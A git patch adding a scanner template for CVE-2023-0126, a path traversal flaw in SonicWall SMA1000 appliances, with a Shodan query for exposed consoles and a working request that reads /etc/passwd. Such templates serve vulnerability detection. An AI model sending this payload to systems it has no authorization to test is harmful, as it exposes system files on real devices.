From f145f75d659a7e001aa850b52acf55202232b9ba Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jun 2023 01:45:29 +0530 Subject: [PATCH] Create CVE-2023-0126.yaml --- http/cves/2023/CVE-2023-0126.yaml | 40 +++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2023/CVE-2023-0126.yaml diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml new file mode 100644 index 0000000000..b04ddee8c4 --- /dev/null +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -0,0 +1,40 @@ +id: CVE-2023-0126 + +info: + name: SonicWall SMA1000 LFI + author: tess + severity: high + description: | + Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0126 + - https://github.com/advisories/GHSA-mr28-27qx-phg3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-0126 + cwe-id: CWE-22 + metadata: + verified: "true" + shodan-query: title:"Appliance Management Console Login" + tags: cve,cve2023,sonicwall,lfi,sma1000 + +http: + - method: GET + path: + - '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: word + part: header + words: + - content/unknown + + - type: status + status: + - 200